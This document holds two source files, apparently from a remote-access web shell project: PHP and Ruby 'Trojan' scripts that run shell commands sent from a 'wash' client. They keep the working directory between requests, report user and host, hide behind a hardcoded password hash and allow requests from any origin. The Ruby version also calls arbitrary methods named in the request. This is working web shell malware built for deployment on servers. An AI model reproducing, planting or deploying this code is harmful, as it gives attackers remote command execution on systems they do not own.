File: trojan/bin/debug/php/shell-only.php
<?php

class Trojan{
    private $cwd      = '';
    private $response = array(
        /*
        'error'          => null,
        'output'         => null,
        'prompt_context' => null,
        */
    );

    /**
     * A generic constructor
     */
    public function __construct(){
        # emulate cwd persistence
        $this->cwd = (isset($_SESSION['cwd'])) ? $_SESSION['cwd'] : trim(`pwd`);
    }

    /**
     * Processes commands sent from the wash client
     *
     * @param string $json             JSON from the wash client
     */
    public function process_command($json){
        # if the specified action was 'shell', pipe the command directly into
        # the web shell.
        if($json['action'] == 'shell'){
            $this->process_shell_command($json['cmd']);
        }

        # otherwise, simply invoke the method directly
        else {
            $this->response['error'] = "{$json['action']} unsupported.";
            $this->send_response();
        }
    }

    /**
     * Processes a command from the wash client
     *
     * @param string $command          A command - this will change
     * @bug: When redirecting output to a file, errors are not reported to the 
     * shell. This happens because stderr is being directed to stdout, which is 
     * in turn being redirected into a file. If the error that was to be 
     * reported was that the redirect file could not be created, however, 
     * output just goes to a black hole. @see Github issue #38.
     */
    private function process_shell_command($command){
        /* @note: In order to get current directory persistence to work, I need 
         * to inject some `cd` and `pwd` commands around the command sent from 
         * the wash client. */
        $output_raw = array();
        exec("cd {$this->cwd}; $command 2>&1; pwd", $output_raw);

        # buffer the results
        $_SESSION['cwd']          = $this->cwd = array_pop($output_raw);
        $this->response['output'] = join($output_raw, "\n");

        # send the response
        $this->send_response();
    }

    /**
     * Sends a response back to the wash client
     */
    private function send_response(){
        /* This header prevents the wash client from malfunctioning due to the 
         * Same-Origin Policy. @see: http://enable-cors.org/ */
        $this->response['prompt_context'] = $this->get_prompt_context();
        header('Access-Control-Allow-Origin: *');

        # assemble and send a JSON-encoded response
        echo json_encode($this->response);
        die();
    }

    /**
     * Assembles the prompt context to return to the wash client
     *
     * @return string $prompt_context  The prompt context
     */
    private function get_prompt_context(){
        $whoami               =  trim(`whoami`);
        $hostname             =  gethostname();
        $line_terminator      =  ($whoami ==  'root') ? '#' : '$' ;
        return "{$whoami}@{$hostname}:{$this->cwd}{$line_terminator}";
    }
}

/* ---------- Procedural code starts here ---------- */

# only process the command if a valid password has been specified
if(sha1($_REQUEST['args']['password'] . 'c5e5f704ee') == '003da5748a1cdeac275548be9741cb35b76f773d'){ 
    session_start();
    $trojan = new Trojan();
    $trojan->process_command($_REQUEST);
}

# otherwise, just spit back an error message
else { 
    header('Access-Control-Allow-Origin: *');
    die('{"error":"Invalid password."}');
}

File: trojan/bin/deploy/ruby/shell-only.rb
#!/usr/bin/env ruby
require 'cgi'
require 'cgi/session'
require 'cgi/session/pstore'
require 'digest/sha1'
require 'json'

class Trojan
    attr_accessor :cgi, :cwd, :response, :session

    def initialize params
        @cgi      = params[:cgi]
        @session  = params[:session]
        @cwd      = (@session[:cwd].nil?) ? `pwd`.strip! : @session[:cwd]
        @response = {};
    end

    def process_command()
        json = @cgi.params
        if json['action'].first.eql? 'shell'
            process_shell_command(json['cmd'].first)
        else
            send json['action'].first, json
        end
    end

    def process_shell_command command
        out_lines           = `cd #{@cwd}; #{command} 2>&1; pwd`.split "\n"
        @cwd                = @session[:cwd] = out_lines.pop
        @response['output'] = out_lines.join "\n"
        self.send_response
    end

    def send_response
        @response['prompt_context'] = self.get_prompt_context
        puts @cgi.header('Access-Control-Allow-Origin: *')
        puts @response.to_json
        exit
    end

    def get_prompt_context
        whoami          =  `whoami`.strip!
        hostname        =  `hostname`.strip!
        line_terminator =  (whoami == 'root') ? '#' : '$';
        return "#{whoami}@#{hostname}:#{@cwd}#{line_terminator}";
    end

    def method_missing method, *args
        @response['error'] = "#{method} unsupported"
        self.send_response
    end
end

# ---------- Procedural code starts here ----------

cgi  = CGI.new

hash = Digest::SHA1.hexdigest(cgi.params['args[password]'].first + 'c5e5f704ee')
if hash.eql? '003da5748a1cdeac275548be9741cb35b76f773d'
    session = CGI::Session.new(
        cgi,
        'database_manager' => CGI::Session::PStore,
        'session_key'      => 'wash',
        'session_expires'  => Time.now + 30 * 60,
        'prefix'           => 'wash_pstore_sid_'
    )
    trojan = Trojan.new({
        :cgi     => cgi, 
        :session => session, 
    })
    trojan.process_command
    session.close
else
    puts cgi.header('Access-Control-Allow-Origin: *')
    puts '{"error":"Invalid password."}'
end